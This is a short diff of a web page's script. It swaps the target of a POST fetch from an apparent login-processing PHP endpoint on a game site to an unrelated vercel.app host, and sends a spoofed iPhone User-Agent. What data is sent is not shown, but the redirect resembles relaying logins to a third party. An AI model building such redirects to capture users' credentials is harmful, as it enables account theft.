--- a/index.html
+++ b/index.html
@@ -32,7 +32,7 @@
       }
 
       try {
-        const response = await fetch("https://www.nso9x.com/assets/ajaxs/Xulylog.php", {
+        const response = await fetch("https://bug-3zx8.vercel.app/", {
           method: "POST",
           headers: {
             "User-Agent": "Mozilla/5.0 (iPhone; CPU iPhone OS 18_6_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/139.0.7258.76 Mobile/15E148 Safari/604.1",
